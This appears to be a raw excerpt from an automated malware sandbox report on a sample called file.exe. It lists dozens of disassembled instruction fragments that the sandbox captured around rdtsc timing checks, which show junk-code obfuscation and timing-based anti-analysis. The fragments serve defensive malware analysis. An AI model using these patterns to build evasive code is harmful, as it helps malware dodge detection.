                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E903DD second address: 4E9041A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushfd 0x00000007 jmp 00007F66C0B35956h 0x0000000c sub ecx, 369FC478h 0x00000012 jmp 00007F66C0B3594Bh 0x00000017 popfd 0x00000018 mov cx, 7FAFh 0x0000001c popad 0x0000001d popad 0x0000001e lea eax, dword ptr [ebp-10h] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9041A second address: 4E90421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov al, bh 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90421 second address: 4E9044F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 5B96DED8h 0x00000008 jmp 00007F66C0B35951h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr fs:[00000000h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 movsx edi, ax 0x0000001c mov eax, 4C5AD19Bh 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9044F second address: 4E904E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F66C0B35207h 0x00000008 pop esi 0x00000009 mov si, di 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [ebp-18h], esp 0x00000012 pushad 0x00000013 mov si, dx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F66C0B35203h 0x0000001d and cx, 045Eh 0x00000022 jmp 00007F66C0B35209h 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F66C0B35200h 0x0000002e add ax, 2858h 0x00000033 jmp 00007F66C0B351FBh 0x00000038 popfd 0x00000039 popad 0x0000003a popad 0x0000003b mov eax, dword ptr fs:[00000018h] 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F66C0B35200h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E904E9 second address: 4E904EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E904EF second address: 4E904F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E904F5 second address: 4E904F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E904F9 second address: 4E90536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35208h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [eax+00000FDCh] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F66C0B35207h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90536 second address: 4E9057E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 197415EAh 0x00000008 pushfd 0x00000009 jmp 00007F66C0B3594Bh 0x0000000e and eax, 3A9ED68Eh 0x00000014 jmp 00007F66C0B35959h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d test ecx, ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F66C0B3594Dh 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9057E second address: 4E905D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F66C0B35275h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F66C0B351FCh 0x00000016 add cx, A368h 0x0000001b jmp 00007F66C0B351FBh 0x00000020 popfd 0x00000021 mov ecx, 0CFCA55Fh 0x00000026 popad 0x00000027 add eax, ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F66C0B35201h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E801B0 second address: 4E801DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B3594Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F66C0B35956h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E801DE second address: 4E801E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E801E2 second address: 4E801E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E801E8 second address: 4E8023A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, CCh 0x00000005 pushfd 0x00000006 jmp 00007F66C0B35207h 0x0000000b sub eax, 15E826CEh 0x00000011 jmp 00007F66C0B35209h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a sub esp, 2Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F66C0B351FDh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8023A second address: 4E80282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F66C0B35957h 0x00000009 jmp 00007F66C0B35953h 0x0000000e popfd 0x0000000f push eax 0x00000010 pop edi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F66C0B35951h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80282 second address: 4E80308 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop edi 0x0000000d pushfd 0x0000000e jmp 00007F66C0B35206h 0x00000013 add si, 1998h 0x00000018 jmp 00007F66C0B351FBh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 pushad 0x00000022 mov di, si 0x00000025 push ecx 0x00000026 pop edx 0x00000027 popad 0x00000028 pushfd 0x00000029 jmp 00007F66C0B351FAh 0x0000002e sub al, FFFFFFF8h 0x00000031 jmp 00007F66C0B351FBh 0x00000036 popfd 0x00000037 popad 0x00000038 xchg eax, edi 0x00000039 pushad 0x0000003a jmp 00007F66C0B35204h 0x0000003f mov ebx, esi 0x00000041 popad 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80308 second address: 4E80320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35954h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8047A second address: 4E8050B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 pop edi 0x00000009 pop eax 0x0000000a popad 0x0000000b test eax, eax 0x0000000d jmp 00007F66C0B35207h 0x00000012 jg 00007F67326131E4h 0x00000018 pushad 0x00000019 movzx eax, dx 0x0000001c mov edi, 6B11EC84h 0x00000021 popad 0x00000022 js 00007F66C0B35276h 0x00000028 jmp 00007F66C0B35203h 0x0000002d cmp dword ptr [ebp-14h], edi 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov ebx, 3905AA76h 0x00000038 pushfd 0x00000039 jmp 00007F66C0B35207h 0x0000003e sub esi, 07CF2AFEh 0x00000044 jmp 00007F66C0B35209h 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8050B second address: 4E80564 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35951h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F67326138C1h 0x0000000f jmp 00007F66C0B3594Eh 0x00000014 mov ebx, dword ptr [ebp+08h] 0x00000017 pushad 0x00000018 mov edx, ecx 0x0000001a call 00007F66C0B3594Ah 0x0000001f movzx ecx, bx 0x00000022 pop edx 0x00000023 popad 0x00000024 lea eax, dword ptr [ebp-2Ch] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F66C0B35954h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80564 second address: 4E80568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80568 second address: 4E8056E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8056E second address: 4E80574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80574 second address: 4E80578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80578 second address: 4E805B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35208h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F66C0B35207h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E805B0 second address: 4E805E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35959h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F66C0B35951h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ecx, edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E805E7 second address: 4E805EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E805EC second address: 4E806C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35952h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F66C0B35950h 0x0000000f push eax 0x00000010 jmp 00007F66C0B3594Bh 0x00000015 nop 0x00000016 jmp 00007F66C0B35956h 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F66C0B3594Eh 0x00000023 add ah, FFFFFFF8h 0x00000026 jmp 00007F66C0B3594Bh 0x0000002b popfd 0x0000002c call 00007F66C0B35958h 0x00000031 pushfd 0x00000032 jmp 00007F66C0B35952h 0x00000037 adc esi, 23FAC688h 0x0000003d jmp 00007F66C0B3594Bh 0x00000042 popfd 0x00000043 pop eax 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 call 00007F66C0B3594Bh 0x0000004e pop ecx 0x0000004f call 00007F66C0B35959h 0x00000054 pop ecx 0x00000055 popad 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E806E6 second address: 4E806EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E806EA second address: 4E80701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35953h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80089 second address: 4E80116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, cl 0x00000005 pushfd 0x00000006 jmp 00007F66C0B35203h 0x0000000b jmp 00007F66C0B35203h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 pushad 0x00000016 mov esi, ebx 0x00000018 pushfd 0x00000019 jmp 00007F66C0B351FBh 0x0000001e xor ch, 0000001Eh 0x00000021 jmp 00007F66C0B35209h 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ecx 0x00000029 jmp 00007F66C0B351FEh 0x0000002e mov dword ptr [ebp-04h], 55534552h 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F66C0B35207h 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80138 second address: 4E8013E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80C7B second address: 4E80C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80C80 second address: 4E80C86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80C86 second address: 4E80C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80CDE second address: 4E80CE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80CE4 second address: 4E80CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80CE8 second address: 4E80D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F66C0B35949h 0x0000000d pushad 0x0000000e mov dl, 7Bh 0x00000010 pushad 0x00000011 mov bx, si 0x00000014 call 00007F66C0B35958h 0x00000019 pop ecx 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d pushad 0x0000001e call 00007F66C0B3594Eh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80D2D second address: 4E80D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F66C0B35201h 0x0000000b adc eax, 47AEF616h 0x00000011 jmp 00007F66C0B35201h 0x00000016 popfd 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jmp 00007F66C0B35201h 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jmp 00007F66C0B351FAh 0x0000002b mov dh, cl 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80D84 second address: 4E80D8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80E5C second address: 4E80E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80E60 second address: 4E80E64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80E64 second address: 4E80E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80E96 second address: 4E80E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80E9C second address: 4E80EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80EA0 second address: 4E80EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90A4C second address: 4E90A93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov si, dx 0x00000011 popad 0x00000012 push edx 0x00000013 mov ah, CFh 0x00000015 pop ebx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F66C0B35209h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90A93 second address: 4E90A99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90A99 second address: 4E90ACB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F66C0B35205h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90ACB second address: 4E90AE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 4B952922h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F66C0B3594Bh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90AE4 second address: 4E90B25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F66C0B351FFh 0x00000009 sbb si, 82CEh 0x0000000e jmp 00007F66C0B35209h 0x00000013 popfd 0x00000014 mov ah, 14h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov cx, bx 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90B25 second address: 4E90B3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B3594Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90B3B second address: 4E90B88 instructions: 0x00000000 rdtsc 0x00000002 mov ax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 movsx edx, ax 0x0000000a popad 0x0000000b mov esi, dword ptr [ebp+0Ch] 0x0000000e jmp 00007F66C0B351FEh 0x00000013 test esi, esi 0x00000015 jmp 00007F66C0B35200h 0x0000001a je 00007F67325F2A44h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F66C0B35207h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90B88 second address: 4E90BDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35959h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [769B459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ecx, edx 0x00000015 pushfd 0x00000016 jmp 00007F66C0B3594Fh 0x0000001b xor ch, 0000005Eh 0x0000001e jmp 00007F66C0B35959h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90BDF second address: 4E90C02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F673260AAA4h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov di, si 0x00000016 jmp 00007F66C0B351FCh 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90C02 second address: 4E90C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 mov si, 6159h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d pushad 0x0000000e mov ax, E291h 0x00000012 jmp 00007F66C0B3594Eh 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c call 00007F66C0B3594Ch 0x00000021 pop esi 0x00000022 call 00007F66C0B3594Bh 0x00000027 pop ecx 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90C41 second address: 4E90C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90C47 second address: 4E90C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90C4B second address: 4E90C69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F66C0B35203h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90C80 second address: 4E90C86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90C86 second address: 4E90C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90C8C second address: 4E90C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90D3B second address: 4E90D79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007F66C0B351FEh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F66C0B35207h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90D79 second address: 4E90D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5DAA9 second address: 5D5DAAE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5DAAE second address: 5D5DABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED3392 second address: 5ED3398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED3398 second address: 5ED33B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F66C0B35955h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED33B2 second address: 5ED3409 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B351FEh 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jl 00007F66C0B351F6h 0x00000010 jnl 00007F66C0B351F6h 0x00000016 jmp 00007F66C0B35207h 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F66C0B35208h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED3409 second address: 5ED340F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC7FCF second address: 5EC7FD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED26DC second address: 5ED26E2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED26E2 second address: 5ED26E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED2862 second address: 5ED288A instructions: 0x00000000 rdtsc 0x00000002 je 00007F66C0B3594Ch 0x00000008 jp 00007F66C0B35946h 0x0000000e jbe 00007F66C0B35952h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED288A second address: 5ED2893 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED2B30 second address: 5ED2B35 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED2B35 second address: 5ED2B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F66C0B35200h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
